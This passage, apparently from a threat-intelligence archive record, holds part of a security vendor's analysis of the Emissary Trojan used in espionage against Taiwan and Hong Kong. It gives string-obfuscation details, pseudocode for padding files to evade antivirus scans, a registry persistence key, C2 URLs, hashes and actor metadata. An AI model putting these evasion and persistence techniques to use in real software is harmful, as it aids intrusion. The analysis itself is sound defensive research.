(compatible; MSIE 7.0; Windows NT 5.1)\nHost: 101.55.33.95\nCache-Control: no-cache\nhttps://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/\nPage 19 of 26\n\nCookie: guid=8cdef38c-808a-4e29-af6e-7386f02d28f1; op=101; SHO=172.16.107.130\r\nVersion 5.1\r\nDate: 9/29/2015\r\nSHA256: 375190cc8e0e75cf771d66347ea2a04b6d1b59bf2f56823eb81270618f133e2d\r\nOriginal Name: WinDLL.dll\r\nFor version 5.1 the malware author took out the exception handling in the Upload File command and obfuscated\r\ntwo strings within the Trojan to avoid detection. The strings exist in the Trojan in encrypted form and are\r\ndecrypted using an algorithm that uses addition to each byte of ciphertext, using 65 (\"A\") as a key. The obfuscated\r\nstrings, as seen below, involve the filename of the log file and the command prompt executable used to create the\r\nremote shell:\r\n\\xEF\\xEF\\xEF\\x00\\xF6\\xF4\\xF7\\x02\\xF7\\x05\\x04\\x00\\x04\\xF4\\x05\\xED\\x13\\x0C\\x0F =\r\n000A758C8FEAE5F.TMP\r\n\\x22\\x2C\\x23\\xED\\x24\\x37\\x24 = cmd.exe\r\nDate: 10/14/2015\r\nSHA256: e369417a7623d73346f6dff729e68f7e057f7f6dae7bb03d56a7510cb3bfe538\r\nOriginal Name: WinDLL.dll\r\nIn an attempt to avoid detection based on PE header hashes, version 5.1 was recompiled without making any\r\nchanges.\r\nVersion 5.3\r\nDate: 11/7/2015\r\nSHA256: 29d8dc863427c8e37b75eb738069c2172e79607acc7b65de6f8086ba36abf051\r\nOriginal Name: WinDLL.dll\r\nEmissary 5.3 moved some code used to create the remote shell out of a sub-function in an attempt to evade\r\nsignatures used to detect the remote shell creation. For instance, in Emissary 5.1 the command handler would call\r\nan initial subfunction that would then call a second subfunction to carry out the activities to create and interact\r\nwith the remote shell. In 5.3, the command handler calls an initial subfunction that carries out the activities to\r\ncreate and interact with the remote shell.\r\nhttps://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/\r\nPage 20 of 26\n\nVersion 5.4\r\nDate: 11/23/2015\r\nSHA256: 69b1d5454abe2475257defd9962a24a92411212c4f592de8765369a97f26c037 (Base DLL with junk data\r\nremoved)\r\nOriginal Name WinDLL.dll\r\nVersion 5.4 of Emissary was the basis for the blog “ELISE: Security Through Obesity” by Michael Yip of PWC.\r\nThis blog provides a great analysis of this version of Emissary and we highly suggest reading it to become\r\nfamiliar with the Trojan.\r\nThere is one difference in the functional code between Emissary versions 5.3 and 5.4, which involves the removal\r\nof the command '107' used to update the Trojan. The string '107' still exists within the Trojan, however, the\r\ncommand handler does not check the C2 response for this command and the code used to update the Trojan has\r\nbeen removed.\r\nThe major difference between Emissary version 5.4 and all previous versions is how the Trojan is saved and\r\nloaded. First, the filenames of the various components of Emissary changed to the following; however, the\r\nfilename for debug logs has not changed:\r\n%APPDATA%\\Programs\\Syncmgr.dll -\u003e Loader Trojan\r\n%APPDATA%\\Programs\\60HGBC00.DAT -\u003e Configuration File\r\n%APPDATA%\\Programs\\WEB2013BW6.DAT -\u003e Emissary Trojan\r\n%TEMP%\\000A758C8FEAE5F.TMP -\u003e Log file\r\nIn addition to file name changes, the biggest (pardon the pun) change involves the Loader Trojan (Syncmgr.dll)\r\nappending junk data to the end of the Emissary DLL file to make incredibly large files. The reason for creating\r\nsuch large files is to trick antivirus applications into not scanning the file, as it could exceed the maximum size of\r\nfiles the antivirus can scan (even VirusTotal has a maximum file size of 128MB). For instance, the following\r\npseudo code contains two loops that will end up appending 524,288,000 bytes to the end of file, resulting in a\r\nDLL that exceeds 500MB in size:\r\n1\r\n2\r\n3\r\n4\r\nWriteFile(hFile, buf_EmissaryDllFromResource, nNumberOfBytesToWrite,\r\n\u0026nNumberOfBytesToWrite, 0);\r\nbuf_junkData = 0;\r\nret_time = time(0);\r\nsrand(ret_time);\r\nhttps://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/\r\nPage 21 of 26\n\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\nfor ( i = 0; i \u003c 51200; ++i )\r\n{\r\n  for ( j = 0; j \u003c 640; ++j )\r\n  {\r\n    random_byte = rand() % 255;\r\n    offset_in_buff_junkData = \u0026buf_junkData + 16 * j;\r\n    dword_junkData = 0x1010101 * random_byte;\r\n    *offset_in_buff_junkData = dword_junkData;\r\n    *(offset_in_buff_junkData + 1) = dword_junkData;\r\n    *(offset_in_buff_junkData + 2) = dword_junkData;\r\n    *(offset_in_buff_junkData + 3) = dword_junkData;\r\n  }\r\n  WriteFile(hFile, \u0026buf_junkData, 0x2800u, \u0026nNumberOfBytesToWrite, 0);\r\n}\r\nWith the new filenames, malware persistence is achieved via the following registry key:\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Syncmgr: \"rundll32.exe \"C:\\Documents and\r\nSettings\\[username]\u003e\\Application Data\\Programs\\Syncmgr.dll\",Setting\"\r\nDate: 11/24/2015\r\nSHA256: bfceccdd553c7e26006bb044ea6d87e597c7cce08218068e31dc940e9f55b636 (Base DLL with junk data\r\nremoved)\r\nOriginal Name: WinDLL.dll\r\nIn another attempt to avoid detection based on PE header hashes, the Trojan was recompiled without making any\r\nchanges.\r\nConclusion\r\nThe actors using Emissary, who were previously reported as behind Operation Lotus Blossom, have been active\r\nfor at least seven years in Southeast Asia. They are persistent, evolve over time, and have enough resources to\r\nhttps://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/\r\nPage 22 of 26\n\nhave multiple custom RATs that receive regular updates. The targeting is largely military or government, with\r\nsome cases of higher education and high tech companies. They also have the ability to select and use appropriate\r\ndecoys in multiple Asian languages that appear legitimate.\r\nThe use of Emissary appears to be focused only on Taiwan and Hong Kong, with regular malware updates to\r\navoid detection and to increase the odds of success. Of particular note, there is an interesting coincidence between\r\nthe timing of the publication of our Operation Lotus Blossom report and a flurry of Emissary updates. The first\r\noccurred ten days after publication and was followed by updates over increasingly shorter time frames, starting at\r\nroughly every three months and progressing to monthly by the final version discussed here. Until that publication,\r\naccording to our research Emissary was updated roughly every two years. This indicates the threat actors may take\r\nnote of threat intelligence reporting and are fully capable of making immediate changes when deemed necessary.\r\nIn addition to the malware evolution, the actors also shifted from solely spear-phishing targets with attachments to\r\nalso compromising legitimate websites to host malware. The consistent updates to the Trojan and the shift in the\r\nactor’s TTPs suggests that this threat will continue to use Emissary in future espionage related attacks.\r\nWe have updated the Emissary tag for Palo Alto Networks AutoFocus users to track this threat using the indicators\r\ndiscussed in this blog.\r\nEmissary Delivery Documents\r\n42b8898c07374b1fc6a4a33441aadf10e47f226d9d3bf3368a459c0e221dff73\r\n37f752f89b0384291af23542efc08c01be962c04e3b2c881a8bc1f8771e9179f\r\n52b7f93bd4c2d1b1818f2a9506551852e2e7b511c9298e71edb54a39f69f94f2\r\n5cda2251059c34f55ac23941b56e248b9a1111e98f62c5a307eadbb9618592dd\r\n70097adba2743653bc73d0a2909a13f2904dbbcc1ffdb4e9013a8e61866abf5c\r\n9bb0288f7b98fac909ed91ec24dad0d5a31e3eec93a1641849d9dab56c23aa59\r\nb201c89fd7bdfc625bacfd4850feaa81269d9b41ed10ba1f7c0cb1339f4a6abe\r\nddbe42fb03bf9f4b9144396e814f13cd7054dcf238234dcb838fa9643136c03a\r\ne67d3cc1684c789c3bd02af7a68b783fd90dc6d2d660b174d533f4c0e07490f9\r\n0c550fad82f2653bc13d9629357a2a56df82602ee0ce96aa5a31f885e3aa29df\r\nf36b7f63f46ae6afe8882b34c1ec11597c8537a3a7fa8b6521a83308940cc77b\r\nEmissary Installers/Loaders\r\nfdcd10a2c2bf802ba5b6be55c16c0bf407bcbee902b66466b0f954d2951fad2d\r\nda29b647411153b49cbf4df862e3f36209eafb8ebe8b966429edec4fb15dbce9\r\nhttps://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/\r\nPage 23 of 26\n\n721676d529a0c439594502f1d53fec697adc80fa1301d2bf20c2600d99ceed4e\r\n0069029ee4029df88f700da335a06e0e3a534a94552fe966186166b526a20b6a\r\n9420017390c598ee535c24f7bcbd39f40eca699d6c94dc35bcf59ddf918c59ab\r\n26e2f4f9026f19156a73ffbfde438916f24d80b8812b6cebe98167eb9be0863c\r\n8e3b7dc3dca92d7458265e2bcd69caa558cbbf24bbbf1200b9aa924260c42480\r\ne817610b62ccd00bdfc9129f947ac7d078d97525e9628a3aa61027396dba419b\r\n02831316a3a04c1248605f28fb08d810230dd4411b2a1fc8187508aea6b449c5\r\n675869fac21a94c8f470765bc6dd15b17cc4492dd639b878f241a45b2c3890fc\r\n70561f58c9e5868f44169854bcc906001947d98d15e9b4d2fbabd1262d938629\r\n925d2f960d8db0510f3681c038311c0c2df86c5ba03f8cb61e3c8846c31bd6e1\r\n98fb1d2975babc18624e3922406545458642e01360746870deee397df93f50e0\r\na8b0d084949c4f289beb4950f801bf99588d1b05f68587b245a31e8e82f7a1b8\r\nb07fbb92484fd2aff6d28f0ab04d5f51e96420b6d670f921b0bbe0e5392da408\r\nc72b07f2a423abc4fc45dfddc5162b8eb1ea97d5b5e66811526433f09b6cdf41\r\ndd8ffb9f961299f7cc9cb51e17a5cccf79b7fb583e594b05ef93b54c8cad54f6\r\nfbcb401cf06326ab4bb53fb9f01f1ca647f16f926811ea66984f1a1b8cf2f7bb\r\ne21b47dfa9e250f49a3ab327b7444902e545bed3c4dcfa5e2e990af20593af6d\r\nEmissary DLL Version 1.0 through 5.4\r\na7d07b92e48876e2195e5d8769a47cf0a237e11ac304e41b14fc36042b0d9484\r\ne6c4611b1399ada920730686395d6fc1700fc39add3d0d40b4f784ccb6ad0c30\r\n931a1284b11a3997c7a99076d582ed3436aa30409dc73bd763436dddd490f9cb\r\n5edf2d0270f8e7eb5be3476802e46c578c4afc4b046411be0806b9acc3bfa099\r\n9dab2d1b16eb0fb4ec2095d4b4e2a3ad67a707ab4f54f9c26539619691f103f3\r\ndcbeca8c92d6d18f2faf385e677913dc8abac3fa3303c1f5cfe166180cffbed3\r\n5171c9a593389011da4d72125e52bf7ef86b2da7fcd6c2a2bc95467afe6a1b58\r\n70bed57bc3484fe5dbcf3c732bd7b11f80a742138f4733bc7e9b6d03e721da4a\r\nhttps://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/\r\nPage 24 of 26\n\nc145bb2e4ce77c79aa01de2aec4a8b5b0b680e23bceda2c230903b5f0e119634\r\n375190cc8e0e75cf771d66347ea2a04b6d1b59bf2f56823eb81270618f133e2d\r\ne369417a7623d73346f6dff729e68f7e057f7f6dae7bb03d56a7510cb3bfe538\r\n29d8dc863427c8e37b75eb738069c2172e79607acc7b65de6f8086ba36abf051\r\n46ad72811990c1937d26e1f80ec1b9def8c112817f4bb9f94e3d1e4f0fb86f80\r\nbfceccdd553c7e26006bb044ea6d87e597c7cce08218068e31dc940e9f55b636\r\n731cd2ce87f4c4375782de0686b5b16619f8fa2de188522cbc8e64f8851bb7ed\r\nacf7dc5a10b00f0aac102ecd9d87cd94f08a37b2726cb1e16948875751d04cc9\r\nEmissary C2 URLs\r\nhttp://101.55.121[.]79/lightserver/Default.aspx\r\nhttp://101.55.33[.]92/default.aspx\r\nhttp://101.55.33[.]92:80/default.aspx\r\nhttp://101.55.33[.]95:80/default.aspx\r\nhttp://103.243.24[.]179/Default.aspx\r\nhttp://118.193.221[.]233:80/default.aspx\r\nhttp://123.1.159[.]153/lightserver/Default.aspx\r\nhttp://123.1.159[.]210/lightserver/Default.aspx\r\nhttp://140.131.39[.]11/icanxp/help/help/default.aspx\r\nhttp://163.20.127[.]27/0test/test/default.aspx\r\nhttp://203.124.14[.]214/default.aspx\r\nhttp://203.124.14[.]229/default.aspx\r\nhttp://210.209.121[.]31/lightserver/default.aspx\r\nhttp://210.209.121[.]92/lightserver/Default.aspx\r\nhttp://210.209.121[.]92/weboffice/Default.aspx\r\nhttp://appletree.onthenetas[.]com/Default.aspx\r\nhttp://bluefield.byinter[.]net/lightserver/Default.aspx\r\nhttp://booking.passinggas[.]net/lightserver/Default.aspx\r\nhttp://chairman.OnTheNetAs[.]com/weboffice/Default.aspx\r\nhttp://dnt5b.myfw[.]us/Default.aspx\r\nhttp://dnt5b.myfw[.]us/default.aspx\r\nhttp://eventlog.findhere[.]org/Default.aspx\r\nhttp://grassland.OnTheNetAs[.]com/lightserver/Default.aspx\r\nhttp://groupspace.findhere[.]org/lightserver/Default.aspx\r\nhttp://photograph.myfw[.]us/lightserver/default.aspx\r\nhttp://ustar5.PassAs[.]us/Default.aspx\r\nhttp://ustar5.PassAs[.]us/default.aspx\r\nhttps://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/\r\nPage 25 of 26\n\nhttp://webonline.OnTheNetAs[.]com/lightserver/default.aspx\r\nhttp://www.danangqt[.]net:80/default.aspx\r\nhttp://zooboo.PassingGas[.]net/weboffice/Default.aspx\r\nEmissary Campaign Codes\r\n3test\r\nFJ201508\r\nlyk_WW\r\nA-1117a\r\nQPR-Z0330\r\nYUIO\r\nZGP-M\r\nxman\r\nA-1117a\r\nFlash\r\nFJ20151125\r\nYUIO\r\nll\r\nA-1231a\r\nux-2011\r\nRT101212\r\n111\r\nUPG-ZHG-01\r\nIC00001\r\nSource: https://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/\r\nhttps://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/\r\nPage 26 of 26", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "references": [ "https://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/" ], "report_names": [ "emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve" ], "threat_actors": [ { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "2fa14cf4-969f-48bc-b68e-a8e7eedc6e98", "created_at": "2022-10-25T15:50:23.538608Z", "updated_at": "2026-04-10T02:00:05.378092Z", "deleted_at": null, "main_name": "Lotus Blossom", "aliases": [ "Lotus Blossom", "DRAGONFISH", "Spring Dragon", "RADIUM", "Raspberry Typhoon", "Bilbug", "Thrip" ], "source_name": "MITRE:Lotus Blossom", "tools": [ "AdFind", "Impacket", "Elise", "Hannotog", "NBTscan", "Sagerunex", "certutil" ], "source_id": "MITRE", "reports": null }, { "id": "c21da9ce-944f-4a37-8ce3-71a0f738af80", "created_at": "2025-08-07T02:03:24.586257Z", "updated_at": "2026-04-10T02:00:03.804264Z", "deleted_at": null, "main_name": "BRONZE ELGIN", "aliases": [ "CTG-8171 ", "Lotus Blossom ", "Lotus Panda ", "Lstudio", "Spring Dragon " ], "source_name": "Secureworks:BRONZE ELGIN", "tools": [ "Chrysalis", "Cobalt Strike", "Elise", "Emissary Trojan", "Lzari", "Meterpreter" ], "source_id": "Secureworks", "reports": null }, { "id": "87a20b72-ab72-402f-9013-c746c8458b0b", "created_at": "2023-01-06T13:46:38.293223Z", "updated_at": "2026-04-10T02:00:02.915184Z", "deleted_at": null, "main_name": "LOTUS PANDA", "aliases": [ "Red Salamander", "Lotus BLossom", "Billbug", "Spring Dragon", "ST Group", "BRONZE ELGIN", "ATK1", "G0030", "Lotus Blossom", "DRAGONFISH" ], "source_name": "MISPGALAXY:LOTUS PANDA", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "eaa8168f-3fab-4831-aa60-5956f673e6b3", "created_at": "2022-10-25T16:07:23.805824Z", "updated_at": "2026-04-10T02:00:04.754761Z", "deleted_at": null, "main_name": "Lotus Blossom", "aliases": [ "ATK 1", "ATK 78", "Billbug", "Bronze Elgin", "CTG-8171", "Dragonfish", "G0030", "G0076", "Lotus Blossom", "Operation Lotus Blossom", "Red Salamander", "Spring Dragon", "Thrip" ], "source_name": "ETDA:Lotus Blossom", "tools": [ "BKDR_ESILE", "Catchamas", "EVILNEST", "Elise", "Group Policy Results Tool", "Hannotog", "LOLBAS", "LOLBins", "Living off the Land", "Mimikatz", "PsExec", "Rikamanu", "Sagerunex", "Spedear", "Syndicasec", "WMI Ghost", "Wimmie", "gpresult" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434733, "ts_updated_at": 1775792067, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/93269fb4566d06a8bc741fe1498cf33c5ce5a9bc.pdf", "text": "https://archive.orkl.eu/93269fb4566d06a8bc741fe1498cf33c5ce5a9bc.txt", "img": "https://archive.orkl.eu/93269fb4566d06a8bc741fe1498cf33c5ce5a9bc.jpg" } }